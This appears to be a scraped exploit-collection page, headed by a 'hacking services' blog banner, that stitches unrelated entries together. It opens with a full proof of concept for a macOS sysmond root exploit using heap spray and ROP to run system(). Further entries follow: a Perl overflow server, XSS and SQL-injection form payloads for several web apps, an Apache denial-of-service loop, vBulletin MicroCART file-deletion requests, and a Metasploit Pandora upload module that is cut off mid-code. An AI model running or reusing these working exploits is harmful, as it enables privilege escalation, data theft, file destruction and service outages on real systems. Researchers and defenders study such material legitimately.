/*
Source: https://code.google.com/p/google-security-research/issues/detail?id=121
*/
/*
tested on OS X 10.9.5 - uses some hard-coded offsets which will have to be fixed-up for other versions!
this poc uses liblorgnette to resolve some private symbols; grab the code from github:
git clone https://github.com/rodionovd/liblorgnette.git
build this PoC with:
clang -o sysmond_exploit_writeup sysmond_exploit_writeup.c liblorgnette/lorgnette.c -framework CoreFoundation
sysmond is a daemon running as root. You can interact with sysmond via XPC ("com.apple.sysmond".)
sub_100001AAF calls sub_100003120 passing the xpc dictionary received from the attacker. This function
allocates a sysmond_request object and fills in fields from the attacker-controlled xpc request dictionary:
;read a uint64 with the key "Type"
__text:0000000100003144 mov rax, cs:_SYSMON_XPC_KEY_TYPE_ptr
__text:000000010000314B mov rsi, [rax]
__text:000000010000314E mov rdi, r14
__text:0000000100003151 call _xpc_dictionary_get_uint64
__text:0000000100003156 mov [rbx+20h], rax ;rbx points to sysmond_request
;read anything with the key "Attributes"
__text:000000010000315A mov rax, cs:_SYSMON_XPC_KEY_ATTRIBUTES_ptr
__text:0000000100003161 mov rsi, [rax]
__text:0000000100003164 mov rdi, r14
__text:0000000100003167 call _xpc_dictionary_get_value
__text:000000010000316C mov [rbx+28h], rax
... continues parsing more fields
The sysmond_request is returned from this function and passed as the first argument to sub_10000337D:
__text:000000010000337D sub_10000337D proc near ; CODE XREF: sub_100001AAF+4Bp
__text:000000010000337D
__text:000000010000337D var_38 = qword ptr -38h
__text:000000010000337D var_30 = dword ptr -30h
__text:000000010000337D var_2C = dword ptr -2Ch
__text:000000010000337D var_28 = qword ptr -28h
__text:000000010000337D var_20 = qword ptr -20h
__text:000000010000337D var_18 = qword ptr -18h
__text:000000010000337D
__text:000000010000337D push rbp
__text:000000010000337E mov rbp, rsp
__text:0000000100003381 push r14
__text:0000000100003383 push rbx
__text:0000000100003384 sub rsp, 30h
__text:0000000100003388 mov rbx, rdi ; sysmond_request pointer
__text:000000010000338B mov rdi, [rbx+20h] ; "Type" uint64 value in the xpc request dictionary
__text:000000010000338F mov rsi, [rbx+28h] ; "Attributes" value in the xpc request dictionary
__text:0000000100003393 call sub_100003454
this function extracts the Type and Attribute values and passes them to sub_100003454:
__text:0000000100003454 sub_100003454 proc near ; CODE XREF: sub_10000337D+16p
__text:0000000100003454 ; handler+C0 p
__text:0000000100003454 push rbp
__text:0000000100003455 mov rbp, rsp
__text:0000000100003458 push r15
__text:000000010000345A push r14
__text:000000010000345C push r12
__text:000000010000345E push rbx
__text:000000010000345F mov r12, rsi ; this is "Attributes" value
__text:0000000100003462 mov r14, rdi ; which was read from the dictionary with xpc_dictionary_get_value
__text:0000000100003465 mov rdi, r12 ; meaning it could be any xpc type
__text:0000000100003468 call _xpc_data_get_length ; use "Attributes" value as an xpc_data object
__text:000000010000346D mov r15, rax
__text:0000000100003470 mov rdi, r15 ; size_t
__text:0000000100003473 call _malloc
__text:0000000100003478 mov rbx, rax
__text:000000010000347B mov rdi, r12
__text:000000010000347E mov rsi, rbx
__text:0000000100003481 xor edx, edx
__text:0000000100003483 mov rcx, r15
__text:0000000100003486 call _xpc_data_get_bytes ; use "Attributes" value again interpreted as an xpc_data
the xpc_data_get_bytes call is the interesting one:
__text:00000000000114BE _xpc_data_get_bytes proc near
__text:00000000000114BE push rbp
__text:00000000000114BF mov rbp, rsp
...
__text:00000000000114D2 mov r14, rsi
__text:00000000000114D5 mov r13, rdi
__text:00000000000114D8 cmp qword ptr [r13+28h], 0FFFFFFFFFFFFFFFFh
__text:00000000000114DD jnz short loc_11515
...
__text:0000000000011515 lea rdi, [r13+28h] ; predicate
__text:0000000000011519 lea rdx, __xpc_data_map_once ; function
__text:0000000000011520 mov rsi, r13 ; context
__text:0000000000011523 call _dispatch_once_f
here, if the value at +28h isn't -1 then our xpc object will be passed as the context to __xpc_data_map_once:
__text:00000000000028E9 __xpc_data_map_once proc near ; DATA XREF: _xpc_data_get_bytes_ptr+1Fo
__text:00000000000028E9 ; __xpc_data_equal+46ao ...
__text:00000000000028E9 push rbp
__text:00000000000028EA mov rbp, rsp
__text:00000000000028ED push r14
__text:00000000000028EF push rbx
__text:00000000000028F0 mov rbx, rdi ; controlled xpc object
__text:00000000000028F3 cmp byte ptr [rbx+48h], 0 ; if the byte at +48h is 0
__text:00000000000028F7 jnz short loc_291E
__text:00000000000028F9 mov rdi, [rbx+30h] ; then pass the pointer at +30h
__text:00000000000028FD lea rsi, [rbx+38h]
__text:0000000000002901 lea rdx, [rbx+40h]
__text:0000000000002905 call _dispatch_data_create_map ; to dispatch_data_create_map
__text:000000000000290A mov r14, rax
__text:000000000000290D mov rdi, [rbx+30h] ; object
__text:0000000000002911 call _dispatch_release ; and then to dispatch_release
we can return early from dispatch_data_create_map by setting the value at +28h from the pointer passed as the first arg to 0:
__text:00000000000012B6 _dispatch_data_create_map proc near ; CODE XREF: __dispatch_data_subrange_map+34p
__text:00000000000012B6 ; __dispatch_operation_perform+DEap
__text:00000000000012B6
__text:00000000000012B6 push rbp
__text:00000000000012B7 mov rbp, rsp
__text:00000000000012BA push r15
__text:00000000000012BC push r14
__text:00000000000012BE push r13
__text:00000000000012C0 push r12
__text:00000000000012C2 push rbx
__text:00000000000012C3 sub rsp, 38h
__text:00000000000012C7 mov [rbp+var_58], rdx
__text:00000000000012CB mov r15, rsi
__text:00000000000012CE mov r14, rdi
__text:00000000000012D1 mov r12, [r14+28h] ; if this is 0
__text:00000000000012D5 test r12, r12
__text:00000000000012D8 jz short loc_131C ; jumps to early return without disturbing anything else
we then reach the call to dispatch_release which is passing the pointer at +30h of the xpc object we control (the API believes this is an xpc_data object)
this ends up calling _dispatch_objc_release which sends the objective c "release" message to the object.
We'll come back to how to get code code execution from that later.
The crux of the bug is that the value of the "Attributes" key in the request dictionary is never validated to actually be an xpc_data object and the gets
passed to functions expecting an xpc_data. In order to exploit this we need to have a value of a type other than xpc_data as the "Attributes" value
in the request dictionary - specifically one where the offsets outlined above have suitably controlled values:
+28h qword 0
+30h pointer to controlled data
+48h byte 0
the xpc_uuid type comes the closest to fulfilling these requirements. We completely control the 16 bytes from +28h so the first two constraints are easily
satisfied. Heap spraying is very reliable and fast in xpc, we can easily map a gigabyte of data into sysmond at a predicable address so we can point the
pointer at +30h to that.
The xpc_uuid object is only 40h bytes though, so we have no control over the byte at +48h which must be 0...
OS X uses magazine malloc which is a heap-based allocator. It has three broad size classes (x<1k = tiny; 1k<x<15k = small; x>15k = large) and within these
it will allocate approximately contiguously (using size-based free-lists to speed things up) with no inline-metadata which means there's a
reasonable expectation that sequential allocations of similar sizes will be contiguous.
Our xpc_uuid object is allocated when the request dictionary is received, so what's the next thing which is allocated?
xpc_dictionaries have 6 hash buckets which store the heads of linked-lists for each bucket. As the dictionary is being deserialized first the value of a
key is deserialized (allocating in this case the xpc_uuid) object then the entry is added to the linked-list (allocting a new linked-list entry struct.)
The structure of a linked-list entry is approximately:
struct ll {
struct ll* forward;
struct ll* backward;
xpc_object_t* object;
uint64_t flags;
char key[0];
}
This is a variable-size struct - the key is allocated inline. If the xpc_uuid is immediately followed in memory by its linked-list entry the the value at +48
will be the least-significant byte of the backward linked-list pointer. Our only requirement is that this byte be 0, which is easily achieved by ensuring that
the previous linked-list entry struct in the list (which this linked-list entry points to) was allocated with an alignment of at least 256 bytes.
The magazine malloc "small" size class heap chunks all have an alignment
of 512 bytes meaning that we just need the linked-list entry prior to the xpc_uuid to be between 1k and 15k. In order for the key to end up in the right linked-list
when it's deserialized we also need to make sure that the long key hashes to the same hash as "Attributes" - since there are only 6 possible hash values this is trivial.
Finally, we can add another xpc_data object to the reqest dictionary with a gigabyte of heapspray as the value - this will be mapped into sysmond at a suitably
predictable address meaning we can set the high 8 bytes of the uuid value to point to this.
At this point we control a pointer to an objective-c object and the code will call objc_msgSend to "send a message" to our controlled object, which is the
objective-c paradigm for calling methods. Let's look at the implementation of this to see how we can turn that into instruction pointer control:
__text:000000000000117F __dispatch_objc_release proc near ; CODE XREF: _dispatch_release:loc_117Aj
__text:000000000000117F ; _dispatch_data_create_subrange+183_p ...
__text:000000000000117F mov rax, rdi
__text:0000000000001182 cmp cs:__os_object_have_gc, 0
__text:0000000000001189 jnz short loc_119E
__text:000000000000118B mov rcx, cs:msgRef_release__objc_msgSend_fixup
__text:0000000000001192 lea rsi, msgRef_release__objc_msgSend_fixup
__text:0000000000001199 mov rdi, rax
__text:000000000000119C jmp rcx
rdi points to our heap sprayed fake objective-c object. This code sets rsi to point to the msgRef_release__objc_msgSend_fixup structure then calls the value at that address
which is objc_msgSend_fixup. msgRef_release__objc_msgSend_fixup is in the __objc_msgrefs section of the data segment and in lldb we can see that at runtime is has the following
contents:
{ /usr/lib/libobjc.A.dylib`objc_msgSend_fixedup, "release" }
and the implementation of objc_msgSend_fixedup is:
(lldb) disassemble --name objc_msgSend_fixedup
libobjc.A.dylib`objc_msgSend_fixedup:
0x7fff91d5d1c4: mov RSI, QWORD PTR [RSI + 8]
0x7fff91d5d1c8: jmpq 0x7fff91d5d080 ; objc_msgSend
which just calls through to objc_msgSend passing the address of the "release" string as the second argument:
(lldb) disassemble --name objc_msgSend
libobjc.A.dylib`objc_msgSend:
0x7fff91d5d080: test RDI, RDI
0x7fff91d5d083: je 0x7fff91d5d0f8
0x7fff91d5d086: test DIL, 1
0x7fff91d5d08a: jne 0x7fff91d5d10f
0x7fff91d5d091: mov R11, QWORD PTR [RDI] ; rdi points to controlled fake objective-c object - read pointer to objective-c class
0x7fff91d5d094: mov R10, RSI ; copy selector (pointer to string of method to call) to r10
0x7fff91d5d097: and R10D, DWORD PTR [R11 + 24] ; mask off n upper bits of the pointer according to value of fake_class+18h
0x7fff91d5d09b: shl R10, 4 ;
0x7fff91d5d09f: add R10, QWORD PTR [R11 + 16] ; use that masked off value as an index into a cache array pointed to by fake_class+10h
0x7fff91d5d0a3: cmp RSI, QWORD PTR [R10] ; does the cache entry selector match the selector passed as the second arg?
0x7fff91d5d0a6: jne 0x7fff91d5d0ac
0x7fff91d5d0a8: jmp QWORD PTR [R10 + 8] ; if so, then call the cached function implementation address
Objective-c classses cache the addresses of the selector strings, not the contents of the strings so in order to exploit this we need to be able
to find the address of the "release" selector passed by _dispatch_objc_release so we can construct a fake selector cache.
All these libraries are loaded at the same address in all processes so we can just find the selector address in this process and it'll be valid for sysmond.
Having done this we get instruction pointer control. At this point rax and rdi point to the heap spray so this PoC uses a pivot gadget in CoreFoundation
to move the stack to point into the heap spray and ROP to a system() call with controlled string :)
*/
#include <dlfcn.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/task.h>
#include <mach-o/dyld_images.h>
#include "liblorgnette/lorgnette.h"
/* find the base address of CoreFoundation for the ROP gadgets */
void* find_library_load_address(const char* library_name){
kern_return_t err;
// get the list of all loaded modules from dyld
// the task_info mach API will get the address of the dyld all_image_info struct for the given task
// from which we can get the names and load addresses of all modules
task_dyld_info_data_t task_dyld_info;
mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);
const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
const struct dyld_image_info* image_infos = all_image_infos->infoArray;
for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
const char* image_name = image_infos[i].imageFilePath;
mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
if (strstr(image_name, library_name)){
return (void*)image_load_address;
}
}
return NULL;
}
struct heap_spray {
void* fake_objc_class_ptr; // -------+
uint8_t pad0[0x10]; // |
uint64_t first_gadget; // |
uint8_t pad1[0x8]; // |
uint64_t null0; // |
uint64_t pad3; // |
uint64_t pop_rdi_rbp_ret; // |
uint64_t rdi; // |
uint64_t rbp; // |
uint64_t system; // |
struct fake_objc_class_t { // |
char pad[0x10]; // <----------+
void* cache_buckets_ptr; //--------+
uint64_t cache_bucket_mask; // |
} fake_objc_class; // |
struct fake_cache_bucket_t { // |
void* cached_sel; // <--------+ //point to the right selector
void* cached_function; // will be RIP :)
} fake_cache_bucket;
char command[256];
};
int main(){
// create the XPC connection to sysmond
xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.sysmond", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
xpc_type_t t = xpc_get_type(event);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
}
printf("received an event\n");
});
xpc_connection_resume(conn);
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
void* heap_spray_target_addr = (void*)0x120202000;
struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, 3, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
memset(hs, 'C', 0x1000);
hs->null0 = 0;
hs->fake_objc_class_ptr = &hs->fake_objc_class;
hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
hs->fake_objc_class.cache_bucket_mask = 0;
// nasty hack to find the correct selector address :)
uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
uint64_t* msgrefs = ptr + 0x1a + (*(int32_t*)(ptr+0x16)); //offset of rip-relative offset of selector
uint64_t sel = msgrefs[1];
printf("%p\n", sel);
hs->fake_cache_bucket.cached_sel = sel;
uint8_t* CoreFoundation_base = find_library_load_address("CoreFoundation");
// pivot:
/*
push rax
add eax, [rax]
add [rbx+0x41], bl
pop rsp
pop r14
pop r15
pop rbp
ret
*/
hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; //0x414142424343; // ROP from here
// jump over the NULL then so there's more space:
//pop, pop, pop, ret: //and keep stack correctly aligned
hs->first_gadget = CoreFoundation_base + 0x46ef7;
hs->pop_rdi_rbp_ret = CoreFoundation_base + 0x2226;
hs->system = dlsym(RTLD_DEFAULT, "system");
hs->rdi = &hs->command;
strcpy(hs->command, "touch /tmp/hello_root");
size_t heap_spray_pages = 0x40000;
size_t heap_spray_bytes = heap_spray_pages * 0x1000;
char* heap_spray_copies = malloc(heap_spray_bytes);
for (int i = 0; i < heap_spray_pages; i++){
memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
}
xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);
xpc_dictionary_set_uint64(msg, "Type", 1);
xpc_dictionary_set_uint64(msg, "Interval", 0);
xpc_connection_t xc = xpc_connection_create(NULL, NULL);
xpc_dictionary_set_connection(msg, "Connection", xc);
// this has the same xpc dictionary hash as "Attributes"
char* long_key = malloc(1024);
memset(long_key, 'A', 1023);
long_key[1023] = '\x00';
xpc_dictionary_set_string(msg, long_key, "something or other that's not important");
uint64_t uuid[] = {0, 0x120202000};
xpc_dictionary_set_uuid(msg, "Attributes", (const unsigned char*)uuid);
xpc_object_t reply = xpc_connection_send_message_with_reply_sync(conn, msg);
printf("send and received\n");
xpc_release(msg);
return 0;
for(;;){
CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
}
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863110014
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/use/bin/perl
# Exploit Title: palringo stack buffer overflow
# Date: 10 January 2015
# Vulnerability discovered by: Mr.ALmfL9
# Vendor Homepage: http://www.palringo.com/
# Software Link: http://www.palringo.com/ar/sa/download/?get=winpc
# Version: 2.8.1
# Tested on: Windows 8.1
use IO::Socket;
$port = 8080;
my $payload = "\x41" x 144;
$payload = $payload. "\x42" x 4 ;
$payload = $payload. "\x42" x 9000;
$serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n";
while($cli=$serv->accept()){
print "[#] port is: $port\n";
print $cli "HTTP/$payload\r\n\r\n";
while(<$cli>){
print $cli;
}
}
#*REFERENCE*
#.1=http://store2.up-00.com/2015-01/1420867197761.png
#.2=http://store2.up-00.com/2015-01/1420867235381.png
source: https://www.securityfocus.com/bid/47834/info
The Microsoft .NET Framework is prone to a remote code-execution vulnerability that affects the Just-In-Time (JIT) compiler optimization on x86 architectures.
Successful exploits may allow an attacker to execute arbitrary code in the context of the browser; this may aid in further attacks.
if ((value == null || value == new string[0]) == false)
source: https://www.securityfocus.com/bid/47826/info
Argyle Social is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
1.
<form action="www.example.com/settings-ajax/stream_filter_rules/create" method="post" name="main">
<input type="hidden" name="stream_filter_rule" value='{"name":"rulename","id":"","flags":[ "flagged"],"networks":null,"user_id":"0","terms":"XSS\& quot;><script>alert(document.cookie)</script>"}'>
</form>
<script>
document.main.submit();
</script>
2.
<form action="www.example.com/publish-ajax/efforts/create" method="post" name="main">
<input type="hidden" name="effort" value='{"effort_id":"","title":"ptitle2\">< font color="#0000FF"><script>alert(document.cookie)</script>","url":"http://www.google.com","short&q uot;:null,"campaigns":[],"primary_campaign":null,"flights":[{"glass_id" ;:"post0","flight_id":null,"mdk":false,"source":"web interface","content_type":"twitter-status","content":{"content":& quot;hello"},"stime":"4/30/2011 23:10:00","networks":[{"id":"1","name":"My Name","type":"twitter","url":"","avatar":"http://a 2.twimg.com/profile_images/1124040897/at-twitter_reasonably_small.png"}],"waparams":{"pnam e":null}}]}'>
</form>
<script>
document.main.submit();
</script>
source: https://www.securityfocus.com/bid/47820/info
Apache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition.
Apache APR versions prior to 1.4.4 are vulnerable.
<?php
/*
Apache 2.2.17 mod_autoindex local/remote Denial of Service
author: Maksymilian Arciemowicz
CVE: CVE-2011-0419
CWE: CWE-399
REMOTE
Find some directory with supported mod_autoindex on the server. The directory should contain long filenames.
http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]
LOCAL
Tested on:
127# httpd -v && uname -a
Server version: Apache/2.2.17 (Unix)
Server built: Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386
Result:
127# ls -la
total 8
drwxrwxrwx 2 root wheel 512 Feb 8 21:41 .
drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..
-rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess
-rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................
-rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php
127# ps -aux -p 617
USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
www 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start
Time = 121:43 and counting
where http://[$localhost]:[$localport]/[$localuri]
*/
$localhost="localhost";
$localport=80;
$localuri="/koniec/";
if(!is_writable(".")) die("!writable");
// Phase 1
// Create some filename
touch("cx".str_repeat(".",125));
// Phase 2
// Create .htaccess with
unlink("./.htaccess");
$htaccess=fopen("./.htaccess", "a");
fwrite($htaccess,"AddDescription \"CVE-2011-0419\" ".str_repeat('*.',512)."\n");
fclose($htaccess);
// Phase 3
// Local connect (bypass firewall restriction)
while(1){
$fp = fsockopen($localhost, $localport, $errno, $errstr, 30);
if (!$fp) echo "$errstr ($errno)<br />\n";
else {
$out = "GET ".$localuri."/?P=".str_repeat("*?",1500)."* HTTP/1.1\r\n";
$out .= "Host: ".$localhost."\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
fclose($fp);
}
}
?>
source: https://www.securityfocus.com/bid/47790/info
Calendarix is prone to multiple cross-site scripting vulnerabilities and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Calendarix 0.8.20080808 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/cal_login.php?op=login" method="post" name="main" />
<input type="hidden" name="login" value="'SQL_CODE_HERE"/>
<input type="hidden" name="password" value=""/>
<input type="submit" value="submit"/>
</form>
http://www.example.com/cal_login.php/%27%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
<form action="http://www.example.com/cal_catview.php?catop=viewcat" method="post" name="main" />
<input type="hidden" name="gocat" value="'</script><script>alert(document.cookie);</script>"/>
<input type="submit" value="submit"/>
</form>
http://www.example.com/cal_date.php?frmname=%3C/script%3E%3Cscript%3Ealert%28123%29;%3C/script%3E
http://www.example.com/cal_footer.inc.php?leftfooter=%3Cscript%3Ealert%28123%29;%3C/script%3E
source: https://www.securityfocus.com/bid/47782/info
ZAPms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ZAPms 1.22 is vulnerable; other versions may also be affected.
The following example request is available:
<form action="http://www.example.com/[path]/?sid=1" method="post" id="Login" >
<input name="nick" type="text" id="nick" value="'SQL+CODE+HERE" />
<input name="pwd" id="pwd" type="password" value="adminpwd" />
<input name="submit" type="submit" class="submit_login" value="Login" />
</form>
source: https://www.securityfocus.com/bid/47786/info
poMMo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
<form action="http://www.example.com/admin/setup/config/general.php" method="post" name="main">
<input type="hidden" name="list_name" value="Mailing List">
<input type="hidden" name="site_name" value='poMMo"><script>alert(document.cookie)</script>'>
<input type="hidden" name="site_name" value="poMMo Website">
<input type="hidden" name="site_url" value="http://www.example.com/">
<input type="hidden" name="site_success" value="">
<input type="hidden" name="site_confirm" value="">
<input type="hidden" name="list_confirm" value="on">
<input type="hidden" name="list_exchanger" value="mail">
</form>
<script>
document.main.submit();
</script>
2.
http://www.example.com/index.php?referer=1"><script>alert(document.cookie)</script>
3.
<form action="http://www.example.com/admin/subscribers/subscribers_groups.php" method="post" name="main">
<input type="hidden" name="group_name value='group"><script>alert("XSS")</script>'>
</form>
<script>
document.main.submit();
</script>
4.
<form action="http://www.example.com/admin/setup/setup_fields.php" method="post" name="main">
<input type="hidden" name="field_name" value='1"><script>alert(document.cookie)</script>'>
<input type="hidden" name="field_type" value="text">
</form>
<script>
document.main.submit();
</script>
source: https://www.securityfocus.com/bid/47784/info
Apache Struts is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Successful exploitation requires 'Dynamic Method Invocation' to be enabled by default.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Apache Struts versions 2.0.0 through 2.2.1.1 are vulnerable.
http://www.example.com/struts2-blank/home.action!login:cantLogin<script>alert(document.cookie)</script>=some_value
# Exploit Title: vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion,
SQL Injection & XSS
# Date: January 8, 2015
# Exploit Author: Technidev (https://technidev.com)
# Vendor Homepage: https://vbulletin.com
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=256723
# Version: 1.1.4
This plugin is fairly old but still used by a lot of people and received
its last update nearly 4 years ago.
It’s vulnerable to arbitrary file deletion and SQL injection.
*Arbitrary File(s) Deletion*
In /microcart/editor/assetmanager/ are a bunch of files which are
probably used to manage files/folders for the administrator,
unfortunately no authentication and checks were added to see if the user
should have access to it and if the request doesn’t contain anything
malicious.
The /microcart/editor/assetmanager/folderdel_.php file contains the
following on top:
$sMsg = "";
if(isset($_POST["inpCurrFolder"]))
{
$sDestination = pathinfo($_POST["inpCurrFolder"]);
//DELETE ALL FILES IF FOLDER NOT EMPTY
$dir = $_POST["inpCurrFolder"];
$handle = opendir($dir);
while($file = readdir($handle)) if($file != "." && $file != "..")
unlink($dir . "/" . $file);
closedir($handle);
if(rmdir($_POST["inpCurrFolder"])==0)
$sMsg = "";
else
$sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
}
By simply sending a POST request to this file, we can delete every
single file in specified folder.
POST to: /microcart/editor/assetmanager/folderdel_.php
POST data: inpCurrFolder: ../../../
This POST request will delete every single .php file in the root folder
of vBulletin.
*Arbitrary File Deletion*
There’s another vulnerability which resides in the
/microcart/editor/assetmanager/assetmanager.php file. It contains an
upload function, which is safe, and a file deletion function, which is
not safe. We can delete any file off the server by abusing this. So
unlike the previous vulnerability I just wrote which deletes all files
by sending a POST request with a folder value, this will only delete 1
file off the server.
Vulnerable code:
if(isset($_POST["inpFileToDelete"]))
{
$filename=pathinfo($_POST["inpFileToDelete"]);
$filename=$filename['basename'];
if($filename!="")
unlink($currFolder . "/" . $filename);
$sMsg = "";
}
Exploited by sending the following request:
POST to: /microcart/editor/assetmanager/assetmanager.php
POST data: inpCurrFolder: ../../../
inpFileToDelete: index.php
This will delete the /index.php file of vBulletin, in the root.
*Aribtrary Folder Creation*
Besides the file deletion, there’s a file called
/microcart/editor/assetmanager/foldernew.php which created a 0755
chmodded folder on the server.
The file contains the following on top:
$sMsg = "";
if(isset($_POST["inpNewFolderName"]))
{
$sFolder = $_POST["inpCurrFolder"]."/".$_POST["inpNewFolderName"];
if(is_dir($sFolder)==1)
{//folder already exist
$sMsg = "<script>document.write(getTxt('Folder already
exists.'))</script>";
}
else
{
//if(mkdir($sFolder))
if(mkdir($sFolder,0755))
$sMsg = "<script>document.write(getTxt('Folder created.'))</script>";
else
$sMsg = "<script>document.write(getTxt('Invalid input.'))</script>";
}
}
By sending the following POST request, we will create a folder with 0755
chmodded permission.
POST to: /microcart/editor/assetmanager/foldernew.php
POST data: inpNewFolderName: davewashere
inpCurrFolder: ../../..
This POST request will create the folder davewashere in the root of the
vBulletin forum.
*SQL Injection*
MicroCART is also vulnerable to SQL injection at several locations
although most of them are rather hard to abuse. I will not explain how
to exploit it, but the vulnerability can be found at /cart.php line 833
to 881 and the function where you can add products to your shopping
cart, at around line 1251 to 1328 where $_POST[‘fields’] is assigned to
the configuration variable which is later used in a query.
*Cross Site Scripting*
When modifying your information at /cart.php?do=cpanel, you can inject
anything you want into the fields.
Viewing reviews of products may be vulnerable as well when you leave out
the wysiwyg POST key.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "Pandora v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
'Description' => %q{
This module exploits an authentication bypass vulnerability in Pandora v3.1 as
disclosed by Juan Galiana Lara. It also integrates with the built-in pandora
upload which allows a user to upload arbitrary files to the '/images/' directory.
This module was created as an exercise in the Metasploit Mastery Class at Blackhat
that was facilitated by egypt and mubix.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Juan Galiana Lara', # Vulnerability discovery
'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module
'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module
'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module
'_flood <freshbones[at]gmail.com>', # Metasploit module
'mubix <mubix[at]room362.com>', # Auth bypass and file upload
'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload
],
'References' =>
[
['CVE', '2010-4279'],
['OSVDB', '69549'],
['BID', '45112']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'Privileged' => false,
'DisclosureDate' => "Nov 30 2010",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),
], self.class)
end
def check
base = target_uri.path
# retrieve software version from login page
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(base, 'index.php')
})
if res and res.code == 200
#Tested on v3.1 Build PC100609 and PC100608
if res.body.include?("v3.1 Build PC10060")
return Exploit::CheckCode::Appears
elsif res.body.include?("Pandora")
return Exploit::CheckCode::Detected
end
end
return Exploit::CheckCode::Safe
rescue ::Rex::ConnectionError
vprint_error("#{peer} - Connection failed")
end
return Exploit::CheckCode::Unknown
end
# upload a payload using the pandora built-in file upload
def upload(base, file, cookies)
data = Rex::MIME::Message.new
data.add_part(file, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@fname}\"")
data.add_part("Go", nil, nil, 'form-data; name="go"')
data.add_part("images", nil, nil, 'form-data; name="directory"')
data.add_part("1", nil, nil, 'form-data; name="upload_file"')
data_post = data.to_s
data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(base, 'index.php'),
'cookie' => cookies,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'vars_get' => {
